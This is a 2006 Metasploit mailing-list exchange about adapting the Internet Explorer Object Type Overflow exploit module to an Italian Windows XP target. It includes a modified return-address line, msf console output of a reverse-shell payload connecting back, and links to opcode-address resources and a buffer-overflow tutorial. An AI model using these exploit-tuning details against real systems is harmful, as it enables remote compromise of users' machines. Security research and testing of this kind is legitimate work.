[framework] Internet Explorer Object Type Overflow
Jerome Athias
jerome.athias at free.fr
Wed May 31 04:45:20 CDT 2006
Hi,
you can find some usefull addresses here:
https://www.securinfos.info/international-opcodes/index.php
also you can use this tool :
https://www.securinfos.info/outils-securite-hacking/Findjmp2.zip
and an example of exploitation on the Windows platform:
http://www.hackingdefined.com/index.php/Savant_Buffer_Overflow
/JA
Angelo Dell'Aera a écrit :
> Hello,
> first of all I have to say I'm not a real expert in the Windows world.
> While trying to exploit Internet Explorer Object Type Overflow on a
> host running Windows XP Professional SP1 through Metasploit I realized
> that the ws2_32 push esp/ret (which is located at 0x71ab1d54 for the
> English version) is located at 0x71a31d54 for the Italian version thus
> I modified the ie_objecttype.pm this way
>
> "Windows XP" => [ 0x71a31d54, 0x7ffdec50 ], # ws2_32 push esp/ret
> SP0/1
>
> When I tried to exploit the vulnerable host I saw IE crashing and on
> the attacker's side this behavior...
>
> msf ie_objecttype(win32_reverse) > exploit
> [*] Starting Reverse Handler.
> [*] Waiting for connections to http://192.168.33.162:8080 ...
> [*] HTTP Client connected from 192.168.33.107:1392 using Windows XP,
> sending payload...
> [*] Got connection from 192.168.33.162:4321 <-> 192.168.33.107:1393
>
> [*] Exiting Reverse Handler.
>
> I tried attaching iexplore.exe with ollydbg and observed an access
> violation when writing to the address 0x77e40000 (this address is in
> ECX and EBX when the access violation is triggered). I suppose I'll
> need to modify even the second address in the target array in order to
> exit in a clean way but I'm really not skilled in the Windows world and
> so hints about how to do it are really welcome.
>
> Regards,
>
>
More information about the framework
mailing list